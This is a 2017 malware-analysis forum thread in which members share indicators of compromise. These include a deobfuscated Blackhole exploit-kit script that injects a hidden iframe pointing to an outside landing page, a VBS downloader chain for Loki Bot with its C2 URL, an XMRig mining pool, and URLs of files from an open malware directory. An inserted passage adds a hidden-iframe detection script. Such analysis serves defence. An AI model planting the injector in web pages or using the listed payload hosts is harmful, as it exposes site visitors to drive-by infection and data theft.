Malware collection

Forum for analysis and discussion about malware.

Re: Malware collection

Postby Antelox » Wed Jul 12, 2017 5:43 pm



This is an old infected page by Blackhole EK.

The malicious iframe, after deobfuscation, looks like

Code:
if (document.getElementsByTagName('body')[0]) { // body already parsed: inject via the DOM API
    iframer();
} else {
    // body not available yet: write the hidden iframe straight into the document
    document.write("<iframe src='http://zihemmi.ru/count26.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    // build a 10x10, invisible, absolutely positioned iframe pointing at the EK landing page
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://zihemmi.ru/count26.php');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}


Code:
http://zihemmi.ru/count26.php


BR,

Antelox
Antelox
 
Posts: 114
Joined: Sun Mar 21, 2010 10:38 pm
Reputation point: 91
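As an added illustration from the detection side (my own example, not code from the thread, from Antelox or from the Blackhole kit), here is a small Node.js heuristic that flags both injection shapes seen in the deobfuscated snippet above: a literal hidden, tiny <iframe> tag (including one carried inside a document.write string) and the DOM-API variant built with createElement('iframe'). The sample inputs and the example.invalid URL are constructed, and the 10-pixel "tiny" threshold and the -100px "off-screen" threshold are assumptions, not values from the post.

```javascript
// Added example (not from the thread): heuristic scanner for concealed iframes.
// Works on raw HTML or script text, so an <iframe> inside document.write("...")
// is caught too. Run with: node hidden_iframe_scan.js

const TINY_PX = 10;       // assumption: a frame 10x10 or smaller is not meant to be seen
const OFFSCREEN_PX = -100; // assumption: anything positioned further left/up than this is hidden

// Parse the attribute list of one <iframe ...> tag into an object.
function parseAttrs(attrText) {
  const attrRe = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  const attrs = {};
  let m;
  while ((m = attrRe.exec(attrText)) !== null) {
    attrs[m[1].toLowerCase()] = (m[2] || m[3] || m[4] || '').trim();
  }
  return attrs;
}

// Parse "visibility:hidden;position:absolute" into { visibility: 'hidden', position: 'absolute' }.
function parseStyle(styleText) {
  const style = {};
  for (const decl of (styleText || '').split(';')) {
    const i = decl.indexOf(':');
    if (i > 0) style[decl.slice(0, i).trim().toLowerCase()] = decl.slice(i + 1).trim().toLowerCase();
  }
  return style;
}

// "10" or "10px" -> 10; undefined or garbage -> NaN (every comparison with NaN is false)
function px(value) {
  return parseFloat(String(value === undefined ? '' : value));
}

// Literal-tag variant: one finding per <iframe> that looks deliberately concealed.
function findHiddenIframes(text) {
  const findings = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(text)) !== null) {
    const attrs = parseAttrs(m[1]);
    const style = parseStyle(attrs.style);
    const reasons = [];
    if (style.visibility === 'hidden' || style.display === 'none') reasons.push('hidden-by-style');
    const w = px(attrs.width !== undefined ? attrs.width : style.width);
    const h = px(attrs.height !== undefined ? attrs.height : style.height);
    if (w <= TINY_PX || h <= TINY_PX) reasons.push('tiny-dimensions');
    if (px(style.left) < OFFSCREEN_PX || px(style.top) < OFFSCREEN_PX) reasons.push('off-screen');
    if (reasons.length) findings.push({ src: attrs.src || '', reasons });
  }
  return findings;
}

// DOM-API variant: `x = document.createElement('iframe')` where x is later hidden by style.
function findDomInjectedIframes(js) {
  const findings = [];
  const createRe = /\b([A-Za-z_$][\w$]*)\s*=\s*document\.createElement\(\s*['"]iframe['"]\s*\)/g;
  let m;
  while ((m = createRe.exec(js)) !== null) {
    const v = m[1].replace(/\$/g, '\\$');
    const hiddenRe = new RegExp("\\b" + v + "\\.style\\.(visibility\\s*=\\s*['\"]hidden['\"]|display\\s*=\\s*['\"]none['\"])");
    const srcRe = new RegExp("\\b" + v + "\\.setAttribute\\(\\s*['\"]src['\"]\\s*,\\s*['\"]([^'\"]*)['\"]|\\b" + v + "\\.src\\s*=\\s*['\"]([^'\"]*)['\"]");
    if (!hiddenRe.test(js)) continue;
    const s = js.match(srcRe);
    findings.push({ src: s ? (s[1] || s[2] || '') : '', reasons: ['dom-injected-hidden'] });
  }
  return findings;
}

// Constructed samples; the URLs are placeholders, not the thread's indicators.
const SAMPLE_DOCUMENT_WRITE =
  "document.write(\"<iframe src='http://example.invalid/count.php' width='10' height='10' " +
  "style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>\");";
const SAMPLE_DOM_INJECT =
  "var f = document.createElement('iframe');f.setAttribute('src','http://example.invalid/count.php');" +
  "f.style.visibility='hidden';f.style.position='absolute';f.setAttribute('width','10');" +
  "document.getElementsByTagName('body')[0].appendChild(f);";
const SAMPLE_BENIGN =
  '<iframe src="https://example.invalid/embed/video" width="560" height="315"></iframe>';

console.log(findHiddenIframes(SAMPLE_DOCUMENT_WRITE));   // one finding, two reasons
console.log(findDomInjectedIframes(SAMPLE_DOM_INJECT));  // one finding, dom-injected-hidden
console.log(findHiddenIframes(SAMPLE_BENIGN));           // []
```

This is a static triage aid, not a replacement for rendering the page: obfuscated injectors that assemble the tag from string fragments will slip past the literal-tag check, which is why the DOM-API check is separate and why findings are best confirmed in an instrumented browser or a sandbox.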

Re: Malware collection

Postby ikolor » Thu Jul 13, 2017 11:50 am

ikolor
 
Posts: 243
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland
Reputation point: 16

Re: Malware collection

Postby Antelox » Thu Jul 13, 2017 12:11 pm



Same shit as the one with SHA256: b9e2390f54ebfe328452d8b79d84b0d1869d27ade8c8819f519ad2100bfb46d5

BR,

Antelox
Antelox
 
Posts: 114
Joined: Sun Mar 21, 2010 10:38 pm
Reputation point: 91

Re: Malware collection

Postby ikolor » Thu Jul 13, 2017 2:18 pm

ikolor
 
Posts: 243
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland
Reputation point: 16

Re: Malware collection

Postby Antelox » Thu Jul 13, 2017 3:54 pm



This is a VBS downloader which downloads another VBS from: https://paste.ee/r/zE7Z8/0

The second VBS drops Loki Bot.

C2:

Code:
hxxp://soundblast.club/sound/sound.php


BR,

Antelox
Antelox
 
Posts: 114
Joined: Sun Mar 21, 2010 10:38 pm
Reputation point: 91

Re: Malware collection

Postby ikolor » Thu Jul 13, 2017 7:23 pm

ikolor
 
Posts: 243
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland
Reputation point: 16

Re: Malware collection

Postby xors » Thu Jul 13, 2017 8:55 pm

@xorsthings
xors
 
Posts: 132
Joined: Mon May 23, 2016 2:01 am
Location: Greece
Reputation point: 63

Re: Malware collection

Postby Antelox » Thu Jul 13, 2017 10:55 pm

Yep, it's XMRig miner.

ETPRO POLICY XMRig CoinMiner Usage

C2:

Code:
xmr.pool.minergate.com:45560


Email:

Code:
testfilatovmarafon@gmail.com


The Github page of the project: https://github.com/xmrig/xmrig

BR,

Antelox
Antelox
 
Posts: 114
Joined: Sun Mar 21, 2010 10:38 pm
Reputation point: 91

Re: Malware collection

Postby markusg » Fri Jul 14, 2017 7:25 am

Open directory.
An exploit and other malware.

Code:
http://no2ro.com/17tes.doc
http://no2ro.com/gibsoncrypter.zip
http://no2ro.com/gibtest.exe
http://no2ro.com/kasati.exe
http://no2ro.com/test.hta


SHA256: 0305c67f80b56dc3b27ab2b27348862880bc23517ddce74e87a4a6fdcd2f0b9f
File name: 17tes.doc
Detection rate: 19 / 57
https://www.virustotal.com/de/file/0305 ... 500015953/

I unpacked gibsoncrypter.zip; now the results for the 2 exe files:

SHA256: 18cae9f4f96d356db18924b182843e27e0759ef95422c1156e3588bfd60985a2
File name: BalloonFastBuilder.exe
Detection rate: 1 / 63
https://www.virustotal.com/de/file/18ca ... 500016117/

SHA256: 454d6d2bc3603106bbdb151cf61ab50bfbe5cc63dc4d9a1da7c899b7c7e6e32a
File name: stub.exe
Detection rate: 21 / 63
https://www.virustotal.com/de/file/454d ... 500016198/

SHA256: dc39f1371bbb11f724fb9bb00cbe0a00b83f6cf4dbd6e60ae31bd3d82d383f9a
File name: gibtest.exe
Detection rate: 17 / 62
https://www.virustotal.com/de/file/dc39 ... 500016401/

SHA256: 339764b340b4c70a02835054993c13d7a2562b8ced06168ae1318ebc0c52680e
File name: kasati.exe
Detection rate: 28 / 62
https://www.virustotal.com/de/file/3397 ... 500016841/
markusg
 
Posts: 713
Joined: Mon Mar 15, 2010 2:53 pm
Reputation point: 141

Re: Malware collection

Postby markusg » Fri Jul 14, 2017 7:29 am

markusg
 
Posts: 713
Joined: Mon Mar 15, 2010 2:53 pm
Reputation point: 141
